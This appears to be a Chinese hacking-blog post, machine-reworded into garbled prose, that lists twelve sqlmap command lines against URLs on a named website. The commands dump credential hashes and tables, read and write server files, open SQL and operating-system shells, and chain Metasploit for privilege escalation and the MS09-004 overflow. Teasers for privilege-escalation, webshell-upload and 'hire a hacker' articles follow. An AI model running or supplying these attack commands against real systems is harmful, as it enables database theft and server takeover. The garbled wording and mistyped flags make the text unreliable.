Sqlmap引入操作 ***
坚信许多都了解Sqlmap,可是却不清楚怎样根据sqlmap来引入对不对?
今日将实战演练教大伙儿怎样真实的应用sqlmap来引入?要是了解这12种方式,包你只必须应用Sqlmap这一个专用工具把握这12种使用 *** 就能打遍天下打遍天下;
Sqlmap引入操作 *** 1:
python /usr/bin/sqlmap.py -u https://www.fujieace.com/mysql/get_int.php?id=1 -f -b --current-user --current-db --users --passwords --dbs -v 0-u 总体目标详细地址
-f 普遍指纹识别后端开发DBMS
-b 查找DBMS条幅
--current-user 查找当今对话客户
--current-db 查找当今数据库查询
--users 枚举类型数据库查询客户
--passwords 枚举类型数据库查询客户登陆密码散列
--dbs 枚举类型能用的数据库查询
-v VERBOSE 详尽水平级別:0-6(初始值1)
Sqlmap引入操作 *** 2:
python /usr/bin/sqlmap.py -u https://www.fujieace.com/oracle/get_int.php?id=1 -b --passwords -U CU --union-use -v 2-u 总体目标详细地址
-b 查找DBMS条幅
--passwords 枚举类型数据库查询客户登陆密码散列
-U 特定数据库查询客户(cu,当今客户的别称)
--unlon-use 假如将会,根据联合查询sql注入查找数据信息
-v VERBOSE 详尽水平级別:0-6(初始值1)
Sqlmap引入操作 *** 3:
python /usr/bin/sqlmap.py -u https://www.fujieace.com/mssql/iis/get_str2.asp?name=fujieace --dump -T users -C surname -D testdb --start 2 --stop 3 -v 2-u 总体目标详细地址
--dump 复印表项
-T 复印表(users)
-C 复印列(surname)
--start 之一个项键入(2,第二个报表顶端)
--stop 最终一项键入(3,第三个报表顶端)
-v VERBOSE 详尽水平级別:0-6(初始值1)
Sqlmap引入应用 *** 4:
python /usr/bin/sqlmap.py -u https://www.fujieace.com/pgsql/get_int.php?id=1 --dump -C 'user.pass' -v 1 --exclude-sysdbs-u 总体目标详细地址
--dump 复印表项
-C 复印列(user.pass)
-v VERBOSE 详尽水平级別:0-6(初始值1)
--exclude-sysdbs lgnore系统软件数据库查询(e.g.information_schema)
留意:沒有出示table名(-T选择项)
Sqlmap引入操作 *** 5:
python /usr/bin/sqlmap.py -u https://www.fujieace.com/oracle/get_int.php?id=1 --sql-shell -v 2-u 总体目标详细地址
--sql-shell 造成一个互动式的sql shell
-v VERBOSE 详尽水平级別:0-6(初始值1)
Sqlmap引入操作 *** 6:
python /usr/bin/sqlmap.py -u https://www.fujieace.com/mssql/iis/get_int.asp?id=1 --read-file "c:\example.txt" -v 2-u 总体目标详细地址
--read-file 文档以从更底层系统文件载入
-v VERBOSE 详尽水平级別:0-6(初始值1)
Sqlmap引入操作 *** 7:
python /usr/bin/sqlmap.py -u https://www.fujieace.com/pgsql/get_int.php?id=1 --write-file /etc/passwd --dest-file /tmp/writetest -v 2-u 总体目标详细地址
--write-file 上传文件到更底层系统文件(/ etc / passwd)
--dest-file 肯定系统文件相对路径载入(/ tmp / writetest)
-v VERBOSE 详尽水平级別:0-6(初始值1)
< p>Sqlmap引入操作 *** 8:
python /usr/bin/sqlmap.py -u https://www.fujieace.com/pgsql/get_int.php?id=1 --os-cmd "id" -v 1-u 总体目标详细地址
--os-cmd 电脑操作系统指令实行(id)
-v VERBOSE 详尽水平级別:0-6(初始值1)
Sqlmap引入操作 *** 9:
python /usr/bin/sqlmap.py -u https://www.fujieace.com/mysql/get_int.aspx?id=1 --os-shell -v 1 --union-use-u 总体目标详细地址
--os-shell 转化成互动式命令提示符
---union-usea 假如将会得话,根据联合查询SQL引入应用petrieve数据信息
-v VERBOSE 详尽水平级別:0-6(初始值1)
Sqlmap引入操作 *** 10:
python /usr/bin/sqlmap.py -u https://www.fujieace.com/pgsql/iis/get_int.aspx?id=1 --os-pwn --msf-path /home/inquis/software/metasploit --priv-esc -v 1-u 总体目标详细地址
--os-pwn 创建客户和数据库查询集群服务器的带外连接
--msf-path metasploit系统文件相对路径(/home/inquis/software/metasploit)
--prive-esc 试着将数据库查询过程的用户权限提高到系统软件
-v VERBOSE 详尽水平级別:0-6(初始值1)
Sqlmap引入操作 *** 11:
python /usr/bin/sqlmap.py -u https://www.fujieace.com/mysql/get_int.php?id=1 --os-pwn --msf-path /home/inquis/software/metasploit -v 1-u 总体目标详细地址
--os-pwn 创建客户和数据库查询集群服务器的带外连接
--msf-path metasploit系统文件相对路径(/home/inquis/software/metasploit)
-v VERBOSE 详尽水平级別:0-6(初始值1)
Sqlmap引入操作 *** 12:
python /usr/bin/sqlmap.py -u https://www.fujieace.com/mssql/iis/get_int.asp?id=1 --os-bof -v 1 --mst-path ~/software/metasploit-u 总体目标详细地址
--os-bof 根据运用微软公司sql *** 服务器跨站脚本攻击(MS09-04)创建客户和数据库查询集群服务器的带外连接,
--msf-path metasploit系统文件相对路径(/home/inquis/software/metasploit)
-v VERBOSE 详尽水平级別:0-6(初始值1)
相关文章
高级入侵防御系统自然环境
Advanced Intrusion Detection Environment 翻译中文也叫:高級入侵防御系统自然环境; 什么叫高級入侵防御系统自然环境? 高級入侵防御系统自然环境(...
cmd提权部分常用命令
CMD部分提权常用命令 ipconfig 显示本地IP地址 net start telnet 开telnet服务 net use z:127.0.0.1c$ 映射对方的C...
改名字找黑客(黑客技术接单)
改名字怎么找黑客 1、接单黑客害群之马。改名字技术接单0。学校机子配置都那样。这其中肯定有不少电脑里存着重要资料愿意花钱赎回的。寻找黑客还碰见了,一次意外,该影片于2007年11月21日在美国上映,黑...
iis7.5加fck解析漏洞后台拿shell
IIS6.0解析漏洞,可以上传a.asp;.jps或者a.asp;a.jpg或者a.asp目录下传任意格式小马,都会解析 这次讲的是IIS7.5解析漏洞, http://www.xxo...
WinDbg可用以调节核心方式运行内存转储
什么叫WinDbg? WinDbg,像OllyDbg,是由Microsoft派发的Microsoft Windows多功能程序调试。该黑客工具可用以调节客户方式程序运行,驱动软件和电脑操作系统自身,...
Discuz! X3.1 刷分系列漏洞
在完成任务时(home.php?mod=draw&do=view&id=xx),任务先前的状态缺少判断 完成任务的链接形如: home.php?mod=draw&...
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!